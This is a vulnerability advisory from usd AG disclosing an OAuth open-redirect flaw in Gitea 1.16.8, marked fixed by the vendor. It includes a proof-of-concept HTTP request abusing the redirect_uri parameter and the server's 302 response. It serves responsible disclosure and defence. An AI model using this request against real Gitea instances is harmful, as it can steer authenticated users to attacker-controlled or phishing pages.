usd-2022-0023 | Open Redirect in Gitea

Advisory ID: usd-2022-0023
Product: Gitea Affected Version: 1.16.8
Vulnerability Type: https://cwe.mitre.org/data/definitions/601.html
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: Not published yet
Last Update: 2022-06-30

Description

Gitea implements OAuth. However if the response_type=code and client_secret parameter are not set in the request, the application redirects the user to the value provided within the redirect_uri parameter.

You need to have a valid client_id to make this working. You can configure one in your account. The victim needs to be authenticated, otherwise the victim will be redirected to the login page and will be redirected to the page after login.

Proof of Concept

Exemplary request:

GET /login/oauth/authorize?client_id=5445d361-XXXf&redirect_uri=https://usd.de HTTP/1.1
Host: localhost:3000
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Cookie: XXX
Connection: close

Corresponding response:

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: https://usd.de?error=unsupported_response_type&error_description=Only+code+response+type+is+supported.&state=
Set-Cookie: _csrf=s[...]; Path=/; Expires=Tue, 21 Jun 2022 14:34:58 GMT; HttpOnly; SameSite=Lax
Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Date: Mon, 20 Jun 2022 14:34:58 GMT
Content-Length: 140
Connection: close

<a href="https://usd.de?error=unsupported_response_type&amp;error_description=Only+code+response+type+is+supported.&amp;state=">Found</a>.

Fix

The OAuth implementation should follow the "OAuth 2.0 Security Best Current Practice"

References

• https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics#section-4.10.2
• https://cwe.mitre.org/data/definitions/601.html

Timeline

• 2022-06-22: Vulnerability identified by Christian Pöschl
• 2022-06-22: First contact request
• 2022-07-01: Investigation started by vendor
• 2022-07-15: Vendor confirms remediation

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.